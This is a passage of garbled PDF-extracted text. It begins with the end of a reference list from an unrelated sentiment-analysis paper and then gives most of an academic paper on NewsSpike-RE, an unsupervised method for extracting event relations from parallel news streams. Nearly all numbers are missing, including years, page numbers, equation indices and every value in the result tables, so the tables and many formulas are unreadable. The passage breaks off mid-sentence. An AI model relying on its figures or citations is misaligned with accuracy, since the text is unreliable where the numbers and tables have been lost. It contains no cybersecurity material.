. sentiment summarization: evaluating and learning user preferences. in proceedings of the th conference of the european chapter of the acl, pages – , athens, greece. junyi jessy li, kapil thadani, and amanda stent. . the role of discourse units in near-extractive summa- rization. in proceedings of the sigdial con- ference, the th annual meeting of the special inter- est group on discourse and dialogue, pages – , los angeles, california, usa. william c. mann and sandra a. thompson. . rhetorical structure theory: toward a functional the- ory of text organization. text-interdisciplinary jour- nal for the study of discourse, ( ): – . oded maron and aparna lakshmi ratan. . multiple-instance learning for natural scene classifica- tion. in proceedings of the th international con- ference on machine learning, volume , pages – , san francisco, california, usa. ramesh nallapati, feifei zhai, and bowen zhou. . summarunner: a recurrent neural network based se- quence model for extractive summarization of docu- ments. in proceedings of the st aaai conference on artificial intelligence, pages – , san fran- cisco, california. ani nenkova. . automatic text summarization of newswire: lessons learned from the document under- standing conference. in proceedings of the th aaai, pages – , pittsburgh, pennsylvania, usa. eric noreen. . computer-intensive methods for testing hypotheses: an introduction. wiley. bo pang and lillian lee. . seeing stars: ex- ploiting class relationships for sentiment categoriza- tion with respect to rating scales. in proceedings of the rd annual meeting on association for compu- tational linguistics, pages – . association for computational linguistics. bo pang, lillian lee, and shivakumar vaithyanathan. . thumbs up? sentiment classification using ma- chine learning techniques. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , pittsburgh, pennsyl- vania, usa. nikolaos pappas and andrei popescu-belis. . ex- plaining the stars: weighted multiple-instance learn- ing for aspect-based sentiment analysis. in proceed- ings of the conference on empirical methods in natural language processing, pages – , doha, qatar, october. nikolaos pappas and andrei popescu-belis. . ex- plicit document modeling through weighted multiple- instance learning. journal of artificial intelligence re- search, : – . lizhen qu, georgiana ifrim, and gerhard weikum. . the bag-of-opinions method for review rating prediction from sparse text patterns. in proceedings of the rd international conference on computational linguistics, pages – , beijing, china. richard socher, jeffrey pennington, eric h. huang, an- drew y. ng, and christopher d. manning. . semi-supervised recursive autoencoders for predicting sentiment distributions. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , edinburgh, scot- land, uk. richard socher, alex perelygin, jean wu, jason chuang, christopher d. manning, andrew y. ng, and christo- pher potts. . recursive deep models for semantic compositionality over a sentiment treebank. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , seattle, washington, usa. maite taboada, julian brooke, milan tofiloski, kimberly voll, and manfred stede. . lexicon-based meth- ods for sentiment analysis. computational linguis- tics, ( ): – . oscar täckström and ryan mcdonald. . discov- ering fine-grained sentiment with latent variable struc- tured prediction models. in proceedings of the th european conference on information retrieval, pages – , aberdeen, scotland, uk. duyu tang, bing qin, and ting liu. . document modeling with gated recurrent neural network for sen- timent classification. in proceedings of the con- ference on empirical methods in natural language processing, pages – , lisbon, portugal. peter d turney. . thumbs up or thumbs down?: semantic orientation applied to unsupervised classifi- cation of reviews. in proceedings of the th annual meeting on association for computational linguistics, pages – , pittsburgh, pennsylvania, usa. sida wang and christopher d. manning. . base- lines and bigrams: simple, good sentiment and topic classification. in proceedings of the th annual meeting of the association for computational linguis- tics: short papers-volume , pages – , jeju island, korea. xiu-shen wei, jianxin wu, and zhi-hua zhou. . scalable multi-instance learning. in proceedings of the ieee international conference on data mining, pages – , shenzhen, china. nils weidmann, eibe frank, and bernhard pfahringer. . a two-level learning method for generalized multi-instance problems. in proceedings of the th european conference on machine learning, pages – , dubrovnik, croatia. janyce wiebe, theresa wilson, and claire cardie. . annotating expressions of opinions and emotions in language. language resources and evaluation, ( ): – . jiajun wu, yinan yu, chang huang, and kai yu. . deep multiple instance learning for image classifica- tion and auto-annotation. in proceedings of the ieee conference on computer vision and pattern recogni- tion, pages – , boston, massachusetts, usa. rui xia and chengqing zong. . exploring the use of word relation features for sentiment classification. in proceedings of the rd international conference on computational linguistics: posters, pages – , beijing, china. xin xu and eibe frank. . logistic regression and boosting for labeled bags of instances. in proceed- ings of the pacific-asia conference on knowledge dis- covery and data mining, pages – . springer- verlag. wei xu, alan ritter, chris callison-burch, william b. dolan, and yangfeng ji. . extracting lexically divergent paraphrases from twitter. transactions of the association for computational linguistics, : – . zichao yang, diyi yang, chris dyer, xiaodong he, alex smola, and eduard hovy. . hierarchical atten- tion networks for document classification. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – , san diego, california, usa. matthew d. zeiler. . adadelta: an adaptive learning rate method. corr, abs/ . . qi zhang, sally a. goldman, wei yu, and jason e. fritts. . content-based image retrieval using multiple- instance learning. in proceedings of the th inter- national conference on machine learning, volume , pages – , sydney, australia. cha zhang, john c. platt, and paul a. viola. . mul- tiple instance boosting for object detection. in ad- vances in neural information processing systems , pages – . mit press. zhi-hua zhou, yu-yin sun, and yu-feng li. . multi-instance learning by treating instances as non- iid samples. in proceedings of the th annual in- ternational conference on machine learning, pages – , montréal, quebec. exploiting parallel news streams for unsupervised event extraction congle zhang, stephen soderland & daniel s. weld computer science & engineering university of washington seattle, wa , usa {clzhang, soderlan, weld}@cs.washington.edu abstract most approaches to relation extraction, the task of extracting ground facts from natural language text, are based on machine learning and thus starved by scarce training data. man- ual annotation is too expensive to scale to a comprehensive set of relations. distant super- vision, which automatically creates training data, only works with relations that already populate a knowledge base (kb). unfortu- nately, kbs such as freebase rarely cover event relations (e.g. “person travels to loca- tion”). thus, the problem of extracting a wide range of events — e.g., from news streams — is an important, open challenge. this paper introduces newsspike-re, a novel, unsupervised algorithm that discovers event relations and then learns to extract them. newsspike-re uses a novel probabilistic graphical model to cluster sentences describ- ing similar events from parallel news streams. these clusters then comprise training data for the extractor. our evaluation shows that newsspike-re generates high quality train- ing sentences and learns extractors that per- form much better than rival approaches, more than doubling the area under a precision-recall curve compared to universal schemas. introduction relation extraction, the process of extracting struc- tured information from natural language text, grows increasingly important for web search and ques- tion answering. traditional supervised approaches, which can achieve high precision and recall, are lim- ited by the cost of labeling training data and are un- likely to scale to the thousands of relations on the web. another approach, distant supervision (craven and kumlien, ; wu and weld, ), creates its own training data by matching the ground instances of a knowledge base (kb) (e.g. freebase) to the un- labeled text. unfortunately, while distant supervision can work well in some situations, the method is limited to rela- tively static facts (e.g., born-in(person, location) or capital-of(location,location)) where there is a cor- responding knowledge base. but what about dy- namic event relations (also known as fluents), such as travel-to(person, location) or fire(organization, person)? since these time-dependent facts are ephemeral, they are rarely stored in a pre-existing kb. at the same time, knowledge of real-time events is crucial for making informed decisions in fields like finance and politics. indeed, news stories report events almost exclusively, so learning to ex- tract events is an important open problem. this paper develops a new unsupervised tech- nique, newsspike-re, to both discover event rela- tions and extract them with high precision. the in- tuition underlying newsspike-re is that the text of articles from two different news sources are not independent, since they are each conditioned on the same real-world events. by looking for rarely de- scribed entities that suddenly “spike” in popularity on a given date, one can identify paraphrases. such temporal correspondence (zhang and weld, ) allow one to cluster diverse sentences, and the re- sulting clusters may be used to form training data in order to learn event extractors. furthermore, one can also exploit parallel news to obtain direct negative evidence. to see this, suppose one day the news in- cludes the following: (a) “snowden travels to hong kong, off southeastern china.” (b) “snowden can- not stay in hong kong as chinese officials will not allow ...” since news stories are usually coherent, it is highly unlikely that travel to and stay in (which is negated) are synonymous. by leveraging such direct negative phrases, we can learn extractors capable of distinguishing heavily co-occurring but semantically different phrases, thereby avoiding many extraction errors. our newsspike-re system encapuslates these intuitions in a novel graphical model making transactions of the association for computational linguistics, vol. , pp. – , . action editor: hal daumé iii. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. the following contributions: • we develop a method to discover a set of dis- tinct, salient event relations from news streams. • we describe an algorithm to exploit paral- lel news streams to cluster sentences that be- long to the same event relations. in particu- lar, we propose the temporal negation heuris- tic to avoid conflating co-occurring but non- synonymous phrases. • we introduce a probabilistic graphical model to generate training for a sentential event extractor without requiring any human annotations. • we present detailed experiments demonstrating that the event extractors, learned from the gener- ated training data, significantly outperform sev- eral competitive baselines, e.g. our system more than doubles the area under the micro-averaged, pr curve ( . vs. . ) compared to riedel’s universal schema (riedel et al., ). previous work supervised learning approaches have been widely developed for event extraction tasks such as muc- and ace. they often focus on a hand-crafted on- tology and train the extractor with manually created training data. while they can offer high precision and recall, they are often domain-specific (e.g. bio- logical events (riedel et al., ; mcclosky et al., ) and entertainment events (benson et al., ; reichart and barzilay, )), and are hard to scale over the events on the web. open ie systems extract open domain relations (e.g. (banko et al., ; fader et al., )) and events (e.g. (ritter et al., )). they often perform self-supervised learning of relation-independent ex- tractions. it allows them to scale but makes them unable to output canonicalized relations. distant supervised approaches have been devel- oped to learn extractors by exploiting the facts exis- ting in a knowledge base, thus avoiding human an- notation. wu et al. ( ) and reschke et al. ( ) learned infobox relations from wikipedia, while mintz et al. ( ) heuristically matched freebase facts to texts. since the training data generated by the heuristic matching is often imperfect, multi- instance learning approaches (riedel et al., ; hoffmann et al., ; surdeanu et al., ) have been developed to combat this problem. unfortu- nately, most facts existing in the kbs are static facts like geographical or biographical data. they fall short of learning extractors for fluent facts such as sports results or travel and meetings by a person. bootstrapping is another common extraction technique (brin, ; agichtein and gravano, ; carlson et al., ; nakashole et al., ; huang and riloff, ). this typically takes a set of seeds as input, which can be ground instances or key phrases. the algorithms then iteratively gener- ate more positive instances and phrases. while there are many successful examples of bootstrapping, the challenge is to avoid semantic drift. large-scale sys- tems, therefore, often require extra processing such as manual validation between the iterations or addi- tional negative seeds as the input. unsupervised approaches have been developed for relation discovery and extractions. these algo- rithms are usually based on some clustering assump- tions over a large unlabeled corpus. common as- sumptions include the distributional hypothesis used by (hasegawa et al., ; shinyama and sekine, ), latent topic assumption by (yao et al., ; yao et al., ), and low rank assumption by (taka- matsu et al., ; riedel et al., ). since the assumptions largely rely on co-occurrence, previous unsupervised approaches tend to confuse correlated but semantically different phrases during extraction. in contrast to this, our work largely avoids these er- rors by exploiting the temporal negation heuristic in parallel news streams. in addition, unlike many unsupervised algorithms requiring human effort to canonicalize the clusters, our work automatically discovers events with readable names. paraphrasing techniques inspire our work. some techniques, such as dirt (lin and pantel, ) and resolver (yates and etzioni, ), are based on the distributional hypothesis. another common approach is to use parallel corpora, including news streams (barzilay and lee, ; dolan et al., ; zhang and weld, ), multiple translations of the same story (barzilay and mckeown, ) and bilingual sentence pairs (ganitkevitch et al., ) to generate the paraphrases. although these algo- rithms create many good paraphrases, they can not be directly used to generate enough training data to train a relation extractor for two reasons: first, the semantics of the paraphrases is often context depen- dent; second, the generated paraphrases are often in parallel news streams e=e(t ,t ) event discover event relations newsspike w/ parallel sentences r r r (a ,a ,t) r r r r r r r r ns=(a ,a ,d,s) group s={s , s ,s } r r r (a ,a ,t) r r r r r r r r e=e(t ,t ) s→e(a ,a ) s’→e(a’ ,a’ ) generate training data training sentences event extractor learn test sentences input extract s→ e(a ,a ) extractions s training phase testing phase figure : during its training phase, newsspike-re first groups parallel sentences as newsspikes. next, the system automatically discovers a set of event relations. then, a probabilistic graphical model clusters sentences from the newsspike as training data for each discovered relation, which is used to learn sentential event extrac- tors. during the testing phase, the extractor takes test sentences as input and predicts event extractions. small clusters and it remains challenging to merge them for the purpose of training an extractor. our work extends previous paraphrasing techniques, no- tably that of zhang and weld ( ), but we fo- cus on generating high-quality, positive and negative training sentences for the discovered events in order to learn extractors with high precision and recall. system overview news articles report an enormous number of events every day. our system, newsspike-re, aligns paralel news streams to indentify and extract these events as shown in figure . newsspike-re has both training and test phases. its training phase has two main steps: event-relation discov- ery and training-set generation. section describes our event relation discovery algorithm, which pro- cesses time-stamped news articles to discern a set of salient, distinct event relations in the form of e = e(t , t ), where e is a representative event phrase and ti are types of the two arguments. newsspike-re generates the event phrases using an open information extraction (ie) system (fader et al., ), and uses a fine-grained entity recogni- tion system figer (ling and weld, ) to gen- erate type descriptors such as “company ”, “politi- cian”, and “medical treatment”. the second part of newsspike-re’s training phase, described in section , is a method for build- ing extractors for the discovered event relations. our approach is motivated by the intuition, adapted from zhang and weld ( ), that articles from different news sources typically use different sentences to de- scribe the same event, and that corresponding sen- tences can be identified when they mention a unique pair of real-world entities. for example, when an un- usual entity pair (selena, norway) is suddenly seen in three articles on a single day: selena traveled to norway to see her ex-boyfriend. selena arrived in norway for a rendezvous with justin. selena’s trip to norway was no coincidence. it is likely that all three refer to the same event re- lation, travel-to(person, location) , and can be used as positive training examples for the relation. as in zhang & weld ( ), we group parallel sentences sharing the same argument pair and date in a struc- ture called a newsspike. however, we include all sentences mentioning the arguments (e.g. selena’s trip to norway) in the newsspike (not just those yielding openie extractions), and use the lexical- ized dependency path between the arguments (e.g. <-[poss]-trip-[prep-to]-> , as the event phrase. in this way, we can generalize extractors beyond the scope of openie. formally, a newsspike is a tu- ple, (a ,a ,d,s), where a and a are arguments (e.g. selena), d is a date, and s is a set of argument- labeled sentences {(s,a ,a ,p) . . .} in which s is a sentence with arguments ai and event phrase p. it’s important that non-synonomous sentences like “selena stays in norway” should be excluded from the training data for travel-to(person, loca- tion) even if a travel-to event did apply to that argu- ment pair. in order to select only the synonomous sentences, we develop a probabilistic graphical model, described in section . , to accurately as- sign sentences from newsspikes to each discov- ered event relation e. given this annotated data, newsspike-re trains extractors using a multi- class logistic regression classfier. during the testing phase, newsspike-re ac- cepts arbitrary sentences (no date-stamp required), uses figer to identify possible arguments, and uses the classifier to predicts which events (if any) hold between an argument pair. we describe the extrac- tion process in section . note that newsspike-re is an unsupervised al- for clarity in the paper, we refer to this relation as travel-to, even though the phrase arrive in is actually more frequent and is selected as the name of this relation by our event discovery algorithm, as shown in table . this dependency path will be referred to as “’s trip to”. 𝐸 𝐸 𝜂 𝜂 𝜂 𝐸 figure : a simple example of the edge-cover algo- rithm with k= , where ei are event relations and ηj are newsspikes. the optimal solution selects e with edges to η and η , and e with edge to η . these two event relations cover all the newsspikes. gorithm that requires no manual labelling of the training instances. like distant supervision, the key is to automatically generate the training data, at which point a traditional supervised classifier may be applied to learn an extractor. because dis- tant supervision creates very noisy annotations, re- searchers often use specialized learners that model the correctness of a training example with a la- tent variable (riedel et al., ; hoffmann et al., ), but we found this unnecessary, because newsspike-re creates high quality training data. discovering salient events the first step of newsspike-re is to discover a set of event relations in the form of e = e(t , t ), where e is an event phrase, and ti are fine-grained ar- gument types generated by figer, augmented with the important types “number” and “money”, which are recognized by the stanford name entity recogni- tion system (finkel et al., ). to be most useful, the discovered event relations should cover salient events that are frequently reported in the news ar- ticles. formally, we say that a newsspike η = (a ,a ,d,s) mentions e = e(t , t ) if the types of ai are ti for each i, and one of its sentence has e as the event phrase between the arguments. to max- imize the salience of the events, newsspike-re will prefer event relations that are “mentioned” by more newsspikes. in addition, the set of event relations should be distict. for example, if the relation travel-to(person, location) is already in the set, then visit(person, lo- cation) should not be selected as a separate relation. to reduce overlap, discovered event relations should not be mentioned by the same newsspike. let e be all candidate event relations, n be all newsspikes. our goal is to select the k most salient relations from e, minimizing overlap between re- lations. we can frame this task as a variant of the bipartite graph edge-cover problem. let a bipartite graph g have one node ei for each event relation in e and one node ηj for each newsspike in n . there is an edge between ei and ηj if ηj mentions ei. the edge-cover problem is to select a largest subset of edges subject to ( ) at most k nodes of ei are cho- sen and all edges incident to them are chosen as the covered edges; ( ) each node of ηj is incident to at most one edge. the first constraint guarantees that there are exactly k event relations discovered; the second constraint ensures that no newsspike partic- ipates in two event relations. figure shows the optimized solution of a simple graph with k = , which can cover edges with event relations that have no overlapping newsspikes. since both the objective function and constraints are linear, we can optimize this edge-cover problem with integer linear programming (nemhauser and wolsey, ). by solving the optimization prob- lem, newsspike-re finds a salient set of event re- lations incident to the covered edges. the discov- ered relations with k set to are shown in table in section . in addition, the covered edges bring us the initial mapping between the event types and newsspikes, which is used to train the probablistic model in section . . generating the training sentences after newsspike-re has discovered a set of event relations, it then generates training instances to learn an extractor for each relation. in this section, we present our algorithm for generating the training sentences. as shown in figure , the generator takes n newsspikes {ηi = (a i,a i,di,si)|i = . . .n} and k event relations {ek = ek(t k, t k)|k = . . .k} as input. for every event relation, ek, the generator identifies a subset of sentences from ∪ni= si expressing the event relation as training sen- tences. in this section, we first characterize the paraphrased event phrases and the parallel sentences in newsspikes. then we show how to encode this heuristic in a probabilistic graphical model that jointly paraphrases the event phrases and identifies a set of training sentences. . exploiting properties of parallel news previous work (zhang and weld, ) proposed several heuristics that are useful to find similar sen- tences in a newsspike. for example, the tempo- ral functionality heuristic says that sentences in a newsspike with the same tense tend to be para- phrases. unfortunately, these methods are too weak to generate enough data for training high quality event extractors: ( ) they are “in-spike heuristics” that tend to generate small clusters from individual newsspikes. it remains unclear how to merge sim- ilar events occuring on different days and between different entities to increase cluster size. ( ) they in- cluded heuristics to “gain precision at the expense of recall” (e.g. news articles do not state the same fact twice), because it is hard to obtain direct nega- tive phrases inside one newsspike. in this paper, we exploit news streams in a cross-spike, global man- ner to obtain accurate positive and negative signals. this allows us to dramatically improve recall while maintaining high precision. our system starts from the basic observation that the parallel sentences tend to be coherent. so if a newsspike η = (a ,a ,d,s) is an instance of an event relation e = e(t , t ), the event phrases in its parallel sentences tend to be paraphrases. but some- times the sentences in the newsspike are related but not paraphrases. for example, one day “snowden will stay in hong kong ...” appears together with “snowden travels to hong kong ...”. although the fact stay-in(snowden, hong kong) is true, it is harm- ful to include “snowden will stay in hong kong” in the training for travel-to(person, location). detecting paraphrases remains a challenge to most unsupervised approaches because they tend to cluster heavily co-occurring phrases which may turn out to be semantically different or even antony- mous. (zhang and weld, ) presented a method to avoid confusion between antonym and synonyms in newsspikes, but did not address the problem of related but different phrases like travel to and stay in in a newsspike. to handle this, our method rests on a simple ob- servation: when you read “snowden travels to hong kong” and “snowden cannot stay in hong kong as chinese officials do not allow ...” in the same newsspike, it is unlike that travel to and stay in are synonymous event phrases because otherwise the two news stories are describing the opposite event. this observation leads to: temporal negation heuristic. two event phrases p and q tend to be semantically different if they co- occur in the newsspike but one of them is in negated form. the temporal negation heuristic helps in two ways: ( ) it provides some direct negative phrases for the event relations; newsspike-re uses these to heuristically label some variables in the model. ( ) it creates some useful features to implement a form of transitvity. for example, if we find that live in and stay in are frequently co-occurring and the temporal negation heuristic tells us that travel to and stay in are not paraphrases, this is evidence that live in is unlikely to be a paraphrase of travel to, even if they are heavily co-occurring. the following section describes our implementa- tion that uses these properties to generate high qual- ity training. our goal is the following: a sentence (s,a ,a ,p) from newsspike η = (a ,a ,d,s) should be included in the training data for event re- lation e = e(t , t ) if the event phrase p is a para- phrase of e and the event relation e happens to the argument pair (a ,a ) at time d. . joint cluster model as discussed above, to identify a high quality set of training sentences from newsspikes, one needs to combine evidence that event phrases are paraphrases with evidence from newsspikes. for this purpose, we define an undirected graphical model to jointly reason about paraphrasing the event phrases and identifying the training sentences from newsspikes. we first list the notation used in this section: e event relation p ∈ p event phrases s ∈ sp sentences w/ the event phrase p y p is p a paraphrase for e? zsp is s w/ p good training for e? Φ factors let p be the union of all the event phrases from every newsspike. for each p ∈ p , let sp be the set of sentences having p as its event phrase. figure (a) shows the model in plate form. there are two kinds of random variables corresponding to phrases and sentences, respectively. for each event relation e = e(t , t ), there exists a connected com- ponent for every event phrase p ∈ p that models ( ) whether p is a paraphrase of e or not (modeled us- ing boolean phrase variables, y p); and ( ) whether each sentence of sp is a good training sentence for e (modeled using |sp| boolean sentence variables {zsp|s ∈ sp}. intuitively, the goal of the model is to find the set of good training sentences, with 𝑝 𝑌 𝑆𝑝 𝑍𝑖 (a) 𝑍 𝑌 ′s trip to selena gomez’s trip to norway … for ucla’s trip to nebraska tsarnaev’s six-month trip to russia escapes the fbi’s attention 𝑍 𝑍 Φjoint Φphrase Φin Φcross (b) 𝑌stay in snowden plans to stay in hongkong manziel stays in austin to attend a fraternity party 𝑍 𝑍 Φjoint Φphrase Φin (c) figure : (a) the connected components depicted as plate model, where each y is a boolean variable for a relation phrase and each z is a boolean variable for a training sentence for with that phrase; (b) and (c) are example connected components for the event phrases ’s trip to and stay in respectively. the goal of the model is to set y = for good paraphrases of a relation and to set z = for good training sentences. zsp = . the union of such sentences over the dif- ferent phrases, ∪p{s|zsp = }, defines the training sentences for the event. figure (b) and (c) show two example connected-components for the event phrases ’s trip to and stay in respectively. now, we can define the joint distribution over the event phrases and the sentences. the joint dis- tribution is a function defined on factors that en- code our observations about newsspikes as features and constraints. the phrase factor Φphrase is a log- linear function attaching to y p with the paraphras- ing features, such as whether p and e co-occur in the newsspikes, or whether p shares the same head word with e. they are used to distinguish whether p is a good event phrase. a sentence should not be identified as a good training sentence if it does not contain a positive event phrase. for example, if y stay in in figure (b) takes the value of , thus all sentences with the event phrase stay in should also take the value of . we implement this constraint with a joint factor Φjoint among y p and zsp variable. in addition, good training sentences occur when the newsspike is an event instance. to encode this observation, we need to featurize the newsspikes and let them bias the assignments. our model im- plements this with two types of log-linear factors: ( ) the unary in-spike factor Φin depends on the sen- tence variables and contains features about the cor- responding newsspike. the factor is used to dis- tinguish whether the newsspike is an instance of e(t , t ), such as whether the argument types of the newsspike match the designated types t , t ; ( ) the pairwise cross-spike factors Φcross connect pairs of sentences. this uses features such as whether the pair of newsspikes for the two sentences have high textual similarity, and whether two newsspikes con- tain negated event phrases. we define the joint distribution for the connected component for p as follows. let z be the vector of sentence variables, let x be the features. the joint distribution is: p(y = y, z = z|x; Θ) def= zx Φphrase(y, x) ×Φjoint(y,z) ∏ s Φin(zs,x) ∏ s,s′ Φcross(zs,zs ′ ,x) where the parameter vector Θ is the weight vec- tor of the features in Φin and Φcross, which are log- linear functions. the joint factors Φjoint is zero when y p = but some zsp = . otherwise, it is set to . we use integer linear programming to perform map inference on the model, finding the predictions y,z that maximize the probability. . learning from heuristic labels we now present the learning algorithm for our joint cluster model. the goal of the learning algorithm is to set Θ for the log-linear functions in the factors in a way that maximizes the likelihood estimation. we do this in a totally unsupervised manner, since manual annotation is expensive and not scalable to large numbers of event relations. the weights are learned in three steps: ( ) newsspike-re creates a set of heuristic labels for a subset of variables in the graphical model; ( ) it uses the heuristic labels as supervision for the model; ( ) it updates Θ with the perceptron learning algorithm. the weights are used to infer the values of the variables that don’t have heuristic labels. the procedure is summarized in figure . for each event relation e = e(t , t ), newsspike-re creates heuristic labels as follows: input: newsspikes and the connected components of the model; heuristic labels: . find positive and negative phrases and sentences p+,p−,s+,s−; . label the connected componenets accordingly and create {(y labeli ,zlabeli ) |mi= }. learning: update Θ with the perceptron learning al- gorithm. output: the values of all variables in the connected components with the map inference. figure : learning from heuristic labels ( ) p+: the temporal functionality heuristic (zhang and weld, ) says that if an event phrase p co- occurs with e in the newsspikes, it tends to be a paraphrase of e. we add the most frequently co- occurring event phrases to p+. p+ also includes e itself. ( ) p−: the temporal negation heuristic says that if p and e co-occur in the newsspike but one of them is in its negated form, p should be nega- tively labeled. we add those event phrases to p−. if a phrase p appears in both p+ and p−, we re- move it from both sets. ( ) s+: we first get the positive newsspikes from the solution of the edge- cover problem in section . we treat the newsspike η as positive if the edge between η and e is cov- ered. next, every sentence with p ∈ p+ is added into s+. ( ) s−: since the event relations discovered in section tend to be distinct relations, a sentence is treated as negative sentence for e if it is heuris- tically labeled as positive for e′ = e. in addition, s− includes all sentences with p ∈ p−. with p+,p−,s+,s−, we define the heuristic la- beled set to be {(y labeli ,zlabeli ) |mi= }, where m is the number of the connected components with the corresponding event phrases p ∈ p+ ∪ p−; y labeli = if p ∈ p+ and y labeli = if p ∈ p−. zi is labeled similarly, but note that if the sentence in the connected component doesn’t exist in s+ ∪s−, newsspike-re doesn’t include the corresponding variable in zlabeli . with {(y labeli ,zlabeli ) |mi= }, learn- ing can be done with maximum likelihood estima- tion as l(Θ) = log ∏ i p(yi = y label i ,zi = z label i | xi, Θ). following (collins, ), we use a fast per- ceptron learning approach to update Θ. it consists of iterating two steps: ( ) map inference given the current weight; ( ) penalizing the weights if the in- ferred assignments are different from the heuristic labeled assignments. sentential event extraction as shown in figure , we learn the extractors from the generated training sentences. note that most dis- tant supervised (hoffmann et al., ; surdeanu et al., ) approaches use multi-instance, aggregate- level training (i.e. the supervision comes from la- beled sets of instances instead of individually la- beled sentences). coping with the noise inherent in these multi-instance bags remains a big challenge for distant supervision. in contrast, our sentence- level training data is more direct and minimizes noise. therefore, we implement the event extrac- tor as a simple multi-class, l -regularized logistic regression classifier. for features of the classifier, we use the lexi- calized dependency paths, the openie phrases, the minimal subtree of the dependency parse and the bag-of-words between the arguments. we also aug- ment them with fine grained argument types pro- duced by figer (ling and weld, ). the event extractor that is learned can take individual test sen- tences (s,a ,a ) as input and predict whether that sentence expresses the event between (a ,a ). empirical evaluation our evaluation addresses two questions. section . considers whether our training generation algorithm identifies accurate and diverse sentences. then, section . investigates whether the event extrac- tor, learned from the training sentences, outperforms other extraction approaches. . experimental setup we follow the procedure described in (zhang and weld, ) to collect parallel news streams and generate the newsspikes: first, we get news seeds and query the bing newswire search engine to gather additional, time-stamped, news articles on a simi- lar topic; next, we extract openie tuples from the news articles and group the sentences that share the same arguments and date into newsspikes. we col- lected the news stream corpus from march st to july st . we split the dataset into two parts: in the training phrase, we use the news streams in (named ns ) to generate the training sen- tences. ns has k newsspikes containing k sentences. we evaluated the extraction performance on news articles collected in (named ns ). in this way, we make sure the test sentences are unseen during training. there are million sentences in ns . we randomly sample k unique sentences having two different arguments recognized by the name entity recognition system. for our event discovery algorithm, we set the number of event relations to be and ran the al- gorithm on ns . the algorithm takes seconds to run on a . ghz cpu. note that most previous unsupervised relation discovery algorithms require additional manual post-processing to assign names to the output clusters. in contrast, newsspike-re discovers the event relations fully automatically and the output is self-explanatory. we list them together with the by-event extraction performance in table . from the table, we can see that most of the discov- ered event relations are salient with little overlap be- tween relations. while we arbitrarily set k to in our experi- ments, there is no inherent limit to the number of relation phrases as long as the news corpus provides sufficient support to learn an extractor for each rela- tion. in future, we plan to explore much larger sets of event relations to see if the extraction accuracy is maintained. the joint cluster model that identifies training sentences for each event relation e = e(t , t ) uses cosine similarity between the event phrase p of a sentence and the canonical phrases of each relation as features in the phrase factors in figure (a). it also includes the cosine similarity between p and a set of “anti-phrases” for the event relation which are recognized by the temporal negation heuristic. for the in-spike factor, we measure whether the fine-grained argument types of the sentence returned from the figer system matches the required ti respectively. in addition, we implement the fea- tures from (zhang and weld, ) to measure whether the sentence is describing the event of the newsspike. for the cross-spike factors, we use tex- tual similarity features between the two sets of par- allel sentences to measure the distance between the pair of newsspikes. . quality of the generated training set the key to a good learning system is a high-quality training set. in this section, we compare our joint model against pipeline systems that consider para- phrases and argument type matching sequentially, system all diverse # mi. ma. # mi. ma. basic , . . , . . yates , . . . . ganit , . . , . . zhang , . . . . newsspike-re , . . , . . w/o cross , . . , . . w/o neg , . . , . . table : quality of the generated training sentences (count, micro- and macro- accuracy), where “all” in- cludes sentences with all event phrases and “diverse” are those with distinct event phrases. based on the following paraphrasing techniques. basic is based on the temporal functionality heuristic of (zhang and weld, ). it treats all event phrases appearing in the same newsspike as paraphrases. yates uses resolver (yates and etzioni, ) to create clusters of phrases. re- solver measures the similarity between the phrases by means of both distributional features and textual features. we convert the sentences in newsspikes into tuples in the form of (a ,p,a ), and run re- solver on these tuples to generate the paraphrases. zhang : we used the generated paraphrase set from (zhang and weld, ). ganit : gan- itkevitch et al. ( ) released a large paraphrase database (ppdb) based on exploiting the bilingual parallel corpora. note that some of these para- phrasing systems do not handle dependency paths. so when p is a dependency path, we use the sur- face string between the arguments as the phrase. newsspike-re: we also conduct ablation testing on newsspike-re to measure the effect of the cross-spike factors and the temporal negation heuris- tic: w/o cross uses a simpler model by remov- ing the cross-spike factors of newsspike-re; w/o negation uses the same joint cluster model as newsspike-re but removes the features and the heuristic labels coming from the temporal negation heuristic. we measured the micro- and macro- accuracy of each system by manually labeling randomly chosen output from each system . annotators read each training sentence, and decided if it was a good example for a particular event. we also report the number of generated sentences. since the extrac- tor should generalize over sentences with dissimilar expressions, it is crucial to identify sentences with two odesk workers were asked to label the dataset, a grad- uate student then reconciled any disagreements. event f @ max recall area u/ pr curve area u/ diverse pr curve # r r p n-re r r p n-re # r r p n-re acquire(organization,person) . . . . . . . . . arrive in(organization,location) . . . . . . . . . arrive in(person,location) . . . . . . . . . beat(organization,organization) . . . . . . . . . beat(person,person) . . . . . . . . . buy(organization,organization) . . . . . . . . . defend(person,person) . . . . . . . . . die at(person,number) . . . . . . . . . die(person,time) . . . . . . . . . fire(organization,person) . . . . . . . . . hit(event,location) . . . . . . . . . lead(person,organization/sports team) . . . . . . . . . leave(person,organization) . . . . . . . . . meet with(person,person) . . . . . . . . . nominate(person/politician,person) . . . . . . . . . pay(organization,money) . . . . . . . . . place(organization,person) . . . . . . . . . play(person/artist,person) . . . . . . . . . release(organization,person) . . . . . . . . . replace(person,person) . . . . . . . . . report(government agency,time) . . . . . . . . . report(written work,time) . . . . . . . . . return to(person/athlete,location) . . . . . . . . . shoot(person,number) . . . . . . . . . sign with(person,organization) . . . . . . . . . sign(organization,person) . . . . . . . . . unveil(organization,product) . . . . . . . . . vote(government,time) . . . . . . . . . win at(person,location) . . . . . . . . . win(person,event) . . . . . . . . . micro average , . . . . . . . . . macro average . . . . . . . . . table : performance of extractors by event relation, reporting both precision and the area under the pr curve. the # column shows the number of true extractions in the pool of sampled output. newsspike-re (labeled n-re) outperforms two implementations of riedel’s universal schemas (see section . for details). the advantage of newsspike-re over universal schemas is greatest on a diverse test set where each sentence has a distinct event phrase. diverse event phrases. therefore we also measured the accuracy and the count of a “diverse” condition: only consider the subset of sentences with distinct event phrases. table shows the accuracy and the number of training examples. the basic temporal system brings us . / . micro- and macro- accuracy overall and . / . in the diverse condition. it shows that newsspikes are promising resources to generate the training set, but that elaboration is nec- essary. yates gets . / . accuracy overall be- cause its textual features help it to recognize many good sentences with similar phrases. but for the di- verse condition, it gets lower precision because the distributional hypothesis fails to distinguish those correlated but different phrases. although ganitkevitch and zhang leverage existing paraphrase databases, it is interesting that their accuracy is still not good. it is largely because many times the paraphrasing must depend on the context: 